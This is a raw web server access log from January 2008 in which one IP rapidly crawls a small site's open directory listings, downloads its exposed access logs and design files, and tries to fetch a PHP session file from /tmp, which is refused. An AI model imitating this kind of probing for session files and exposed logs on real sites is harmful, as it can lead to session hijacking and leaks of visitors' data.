89.181.61.205 - - [22/Jan/2008:10:51:18 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:23 -0800] "GET /bikes/dteel/EQ2/Screenshots/?M=A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:24 -0800] "GET /bikes/dteel/EQ2/Screenshots/?M=D HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:25 -0800] "GET /bikes/dteel/EQ2/Screenshots/?D=A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:27 -0800] "GET /bikes/dteel/EQ2/Screenshots/?D=D HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:28 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:28 -0800] "GET /bikes/dteel/10MAR07/?M=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:29 -0800] "GET /bikes/dteel/?N=A HTTP/1.1" 200 8544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:30 -0800] "GET /bikes/dteel/?N=D HTTP/1.1" 200 8544 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:32 -0800] "GET /bikes/dteel/10MAR07/?D=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:33 -0800] "GET /bikes/dteel/10MAR07/?D=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:33 -0800] "GET /bikes/dteel/EQ2/Screenshots/?N=A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:35 -0800] "GET /bikes/dteel/EQ2/Screenshots/?N=D HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:36 -0800] "GET /bikes/?D=A HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:37 -0800] "GET /bikes/?D=D HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:38 -0800] "GET /bikes/dteel/EQ2/Screenshots/?A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:39 -0800] "GET /bikes/?A HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:41 -0800] "GET /bikes/CreSTOC07/?M=A HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:42 -0800] "GET /bikes/CreSTOC07/?M=D HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:44 -0800] "GET /bikes/dteel/140CANON/ HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:45 -0800] "GET /bikes/dteel/140CANON/?N=D HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:46 -0800] "GET /bikes/dteel/140CANON/?N=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:46 -0800] "GET /bikes/dteel/140CANON/?M=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:47 -0800] "GET /bikes/dteel/EQ2/?M=A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:48 -0800] "GET /bikes/dteel/140CANON/?A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:50 -0800] "GET /bikes/dteel/EQ2/?M=D HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:50 -0800] "GET /bikes/dteel/140CANON/?M=D HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:51 -0800] "GET /bikes/dteel/15JAN08/ HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:52 -0800] "GET /bikes/dteel/15JAN08/?M=A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:52 -0800] "GET /bikes/dteel/15JAN08/?M=D HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:53 -0800] "GET /bikes/dteel/15JAN08/?D=A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:54 -0800] "GET /bikes/dteel/15JAN08/?D=D HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:54 -0800] "GET /bikes/dteel/15JAN08/?A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:51:57 -0800] "GET /logs/access_080104.log HTTP/1.1" 200 467398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:00 -0800] "GET /logs/access_071226.log HTTP/1.1" 200 357658 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:01 -0800] "GET /logs/access_071001.log HTTP/1.1" 200 33494 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:02 -0800] "GET /logs/access_070902.log HTTP/1.1" 200 22717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:04 -0800] "GET /logs/access_070824.log HTTP/1.1" 200 40957 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:05 -0800] "GET /logs/access_070630.log HTTP/1.1" 200 36187 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:08 -0800] "GET /logs/access_070723.log HTTP/1.1" 200 7507 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:09 -0800] "GET /logs/access_071218.log HTTP/1.1" 200 141071 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:11 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:12 -0800] "GET /minamijewelry/source_images/batch1/?N=D HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:14 -0800] "GET /minamijewelry/source_images/batch1/?A HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:15 -0800] "GET /minamijewelry/source_images/batch1/?M=A HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:16 -0800] "GET /minamijewelry/source_images/batch1/?M=D HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:17 -0800] "GET /logs/access_070816.log HTTP/1.1" 200 48263 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:19 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:21 -0800] "GET /mobilehackers/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:22 -0800] "GET /logs/access_070715.log HTTP/1.1" 200 115427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:25 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:27 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:28 -0800] "GET /bikes/GPS/WeSTOC2006/?N=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:29 -0800] "GET /bikes/GPS/WeSTOC2006/?N=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:30 -0800] "GET /bikes/GPS/WeSTOC2006/?A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:30 -0800] "GET /bikes/GPS/WeSTOC2006/?M=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:31 -0800] "GET /bikes/GPS/WeSTOC2006/?M=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:32 -0800] "GET /bikes/GPS/WeSTOC2006/?D=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:33 -0800] "GET /bikes/GPS/WeSTOC2006/?D=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:33 -0800] "GET /bikes/dteel/15JAN08/?N=A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:34 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:35 -0800] "GET /plans/?N=D HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:36 -0800] "GET /plans/?N=A HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:36 -0800] "GET /plans/?A HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:37 -0800] "GET /plans/?M=A HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:38 -0800] "GET /plans/?M=D HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:39 -0800] "GET /plans/?D=A HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:40 -0800] "GET /plans/?D=D HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:45 -0800] "GET /logs/access_080111.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:46 -0800] "GET /logs/access_070808.log HTTP/1.1" 200 84948 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:48 -0800] "GET /minamijewelry/source_images/batch1/?D=A HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:52:49 -0800] "GET /bikes/dteel/15JAN08/?N=D HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:40 -0800] "GET /retreat1/webcam/?M=A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:47 -0800] "GET /logs/access_070831.log HTTP/1.1" 200 35113 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:48 -0800] "GET /minamijewelry/html/schedule.html HTTP/1.1" 200 12759 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:50 -0800] "GET /logs/access_070707.log HTTP/1.1" 200 48967 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:52 -0800] "GET /bikes/dteel/140CANON/?D=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:53 -0800] "GET /bikes/dteel/EQ2/?D=A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:53:54 -0800] "GET /logs/access_071101.log HTTP/1.1" 200 4709 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:39 -0800] "GET /retreat1/webcam/?M=D HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:46 -0800] "GET /minamijewelry/source_images/batch1/?D=D HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:47 -0800] "GET /logs/access_070730.log HTTP/1.1" 200 41451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:49 -0800] "GET /minamijewelry/source_images/updated1/?N=A HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:52 -0800] "GET /logs/access_080103.log HTTP/1.1" 200 448825 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:53 -0800] "GET /minamijewelry/html/flower.html HTTP/1.1" 200 20957 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:54 -0800] "GET /bikes/dteel/EQ2/?D=D HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:55 -0800] "GET /bikes/dteel/140CANON/?D=D HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:56 -0800] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:54:58 -0800] "GET /logs/access_070901.log HTTP/1.1" 200 28607 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:00 -0800] "GET /logs/access_070823.log HTTP/1.1" 200 56843 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:01 -0800] "GET /minamijewelry/source_images/updated1/?N=D HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:02 -0800] "GET /minamijewelry/html/clearance.html HTTP/1.1" 200 12258 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:03 -0800] "GET /bikes/dteel/03MAR07/ HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:04 -0800] "GET /bikes/dteel/03MAR07/?M=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:05 -0800] "GET /bikes/dteel/03MAR07/?M=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:06 -0800] "GET /bikes/dteel/03MAR07/?D=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:07 -0800] "GET /bikes/dteel/03MAR07/?D=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:08 -0800] "GET /bikes/dteel/03MAR07/?N=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:09 -0800] "GET /bikes/dteel/03MAR07/?N=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:09 -0800] "GET /bikes/dteel/03MAR07/?A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:10 -0800] "GET /megumi/Necklace/?N=A HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:11 -0800] "GET /logs/access_070722.log HTTP/1.1" 200 78392 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:13 -0800] "GET /megumi/Necklace/?N=D HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:15 -0800] "GET /logs/access_071217.log HTTP/1.1" 200 231335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:18 -0800] "GET /logs/access_070815.log HTTP/1.1" 200 31884 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:19 -0800] "GET /bikes/dteel/WeSTOC07/ HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:20 -0800] "GET /bikes/dteel/WeSTOC07/?N=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:21 -0800] "GET /bikes/dteel/WeSTOC07/?N=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:22 -0800] "GET /bikes/dteel/WeSTOC07/?M=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:23 -0800] "GET /bikes/dteel/WeSTOC07/?M=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:24 -0800] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:24 -0800] "GET /bikes/dteel/WeSTOC07/?D=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:25 -0800] "GET /bikes/dteel/WeSTOC07/?A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:26 -0800] "GET /logs/access_070714.log HTTP/1.1" 200 51386 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:32 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:33 -0800] "GET /logs/access_071209.log HTTP/1.1" 200 44097 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:37 -0800] "GET /logs/access_080110.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:38 -0800] "GET /logs/access_070807.log HTTP/1.1" 200 47717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:40 -0800] "GET /minamijewelry/flower.psd HTTP/1.1" 200 109558 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:43 -0800] "GET /tmp/sess_b02b0a4ed104cb1876313e693d78b288 HTTP/1.1" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:44 -0800] "GET /logs/access_070830.log HTTP/1.1" 200 30370 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:46 -0800] "GET /minamijewelry/source_images/?N=A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:46 -0800] "GET /logs/access_070706.log HTTP/1.1" 200 26632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:48 -0800] "GET /bikes/GPS/?A HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:55:49 -0800] "GET /logs/?N=A HTTP/1.1" 200 31254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
